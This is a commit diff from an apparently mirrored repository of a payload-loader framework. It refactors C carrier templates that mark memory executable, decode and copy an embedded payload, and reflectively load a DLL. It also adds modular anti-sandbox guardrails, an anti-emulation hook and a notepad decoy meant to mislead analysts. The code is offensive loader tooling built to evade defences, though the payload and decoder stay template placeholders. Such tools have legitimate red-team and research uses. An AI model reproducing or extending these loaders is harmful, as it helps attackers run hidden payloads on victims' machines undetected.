admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: fix carrier & templates (modularize)

Browse Source
This commit is contained in:
Dobin Rutishauser
2024-06-17 05:52:56 +02:00
parent 434c099365
commit b5641214e2
10 changed files with 116 additions and 58 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/source/carrier/alloc_rw_rwx/template.c
+12 -25
View File
@@ -17,28 +17,25 @@ char *supermega_payload;
{{plugin_antiemulation}} {{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
// Execution Guardrail: Env Check DWORD result;
wchar_t envVarName[] = L"USERPROFILE";
wchar_t tocheck[] = L"C:\\Users\\"; // Call: Execution Guardrail
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency! if (executionguardrail() != 0) {
DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024); return 1;
if (result == 0) {
return 6;
}
if (mystrcmp(buffer, tocheck) != 0) {
return 6;
} }
// Depends on plugin_antiemulation // Call: Anti Emulation plugin
antiemulation(); antiemulation();
// Decoy // Call: Decoy plugin
{{plugin_decoy}} decoy();
//WinExec("C:\\windows\\system32\\notepad.exe", 1);
// Allocate 1 // Allocate 1
// char *dest = ... // char *dest = ...
@@ -62,13 +59,3 @@ int main()
return 0; return 0;
} }
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
data/source/carrier/alloc_rw_rx/template.c
+15 -13
View File
@@ -11,6 +11,11 @@ char *supermega_payload;
{{plugin_antiemulation}} {{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
/* iat_reuse_rx /* iat_reuse_rx
Standard IAT reuse shellcode Standard IAT reuse shellcode
@@ -20,11 +25,18 @@ char *supermega_payload;
int main() int main()
{ {
// Depends on plugin_antiemulation DWORD result;
// Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation(); antiemulation();
// Decoy // Call: Decoy plugin
{{plugin_decoy}} decoy();
// Allocate 1 // Allocate 1
// char *dest = ... // char *dest = ...
@@ -48,13 +60,3 @@ int main()
return 0; return 0;
} }
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
data/source/carrier/change_rwx_rx/template.c
+18
View File
@@ -15,11 +15,29 @@ char *supermega_payload;
* does (rw/rx) -> rwx -> rx * does (rw/rx) -> rwx -> rx
*/ */
{{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
DWORD result; DWORD result;
char *dest = supermega_payload; char *dest = supermega_payload;
// Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation();
// Call: Decoy plugin
decoy();
// Note: RWX if carrier and payload are on the same page (or we cant exec copy..) // Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
// can do only RW otherwise? // can do only RW otherwise?
for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) { for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
data/source/carrier/dll_loader_alloc/template.c
+21 -1
View File
@@ -143,9 +143,29 @@ DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
} }
{{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE); char* dest = NULL;
// Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation();
// Call: Decoy plugin
decoy();
dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
// FROM supermega_payload[] // FROM supermega_payload[]
// TO dest[] // TO dest[]
data/source/carrier/dll_loader_change/template.c
+19 -16
View File
@@ -122,8 +122,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
for (DWORD i = 0; i < relocationsCount; i++) for (DWORD i = 0; i < relocationsCount; i++)
{ {
relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY); relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
// THIZ
if (relocationEntries[i].Type == 0) if (relocationEntries[i].Type == 0)
{ {
continue; continue;
@@ -134,15 +132,11 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
//ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL); //ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);
DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA); DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA);
//DWORD_PTR value = *addressToPatch; //DWORD_PTR value = *addressToPatch;
*addressToPatch += deltaImageBase; *addressToPatch += deltaImageBase;
//mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR)); //mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));
} }
} }
MessageBoxW(0, L"AAA2", L"AAA2", MB_OK);
// resolve import address table // resolve import address table
PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL; PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
@@ -187,26 +181,35 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
} }
{{plugin_antiemulation}}
{{plugin_decoy}}
{{plugin_executionguardrail}}
int main() int main()
{ {
// char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
//char* dest = VirtualAlloc(0, 0x7000, 0x3000, PAGE_EXECUTE_READWRITE);
char* dest = supermega_payload; char* dest = supermega_payload;
DWORD protect, oldProtect; DWORD protect, oldProtect;
protect = PAGE_EXECUTE_READWRITE;
VirtualProtect((LPVOID)dest, 0x7000, protect, &oldProtect);
MessageBoxW(0, L"ok virtualprotect", L"AAA2", MB_OK); // Call: Execution Guardrail
if (executionguardrail() != 0) {
return 1;
}
// Call: Anti Emulation plugin
antiemulation();
// Call: Decoy plugin
decoy();
VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);
// FROM supermega_payload[] // FROM supermega_payload[]
// TO dest[] // TO dest[]
// Including decryption // Including decryption
{{ plugin_decoder }} {{ plugin_decoder }}
MessageBoxW(0, L"ok copy", L"AAA2", MB_OK);
// Load the DLL at dest // Load the DLL at dest
DWORD_PTR dllBase; DWORD_PTR dllBase;
data/source/decoy/none.c
+4
View File
@@ -0,0 +1,4 @@
void decoy() {
// None
}
data/source/decoy/winexec.c
+4 -1
View File
@@ -1 +1,4 @@
WinExec("C:\\windows\\system32\\notepad.exe", 1);
void decoy() {
WinExec("C:\\windows\\system32\\notepad.exe", 1);
}
data/source/guardrails/env.c
+18
View File
@@ -1,3 +1,18 @@
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
int executionguardrail() {
// Execution Guardrail: Env Check // Execution Guardrail: Env Check
wchar_t envVarName[] = L"USERPROFILE"; wchar_t envVarName[] = L"USERPROFILE";
wchar_t tocheck[] = L"C:\\Users\\"; wchar_t tocheck[] = L"C:\\Users\\";
@@ -9,3 +24,6 @@
if (mystrcmp(buffer, tocheck) != 0) { if (mystrcmp(buffer, tocheck) != 0) {
return 6; return 6;
} }
return 0;
}
data/source/guardrails/none.c
+3
View File
@@ -0,0 +1,3 @@
int executionguardrail() {
// None
}
phases/templater.py
+1 -1
View File
@@ -67,7 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoder': plugin_decoder, 'plugin_decoder': plugin_decoder,
'plugin_antiemulation': plugin_antiemualation, 'plugin_antiemulation': plugin_antiemualation,
'plugin_decoy': plugin_decoy, 'plugin_decoy': plugin_decoy,
'plugin_guardrails': plugin_guardrails, 'plugin_executionguardrail': plugin_guardrails,
'PAYLOAD_LEN': payload_len, 'PAYLOAD_LEN': payload_len,
}) })
with open(settings.main_c_path, "w", encoding='utf-8') as file: with open(settings.main_c_path, "w", encoding='utf-8') as file: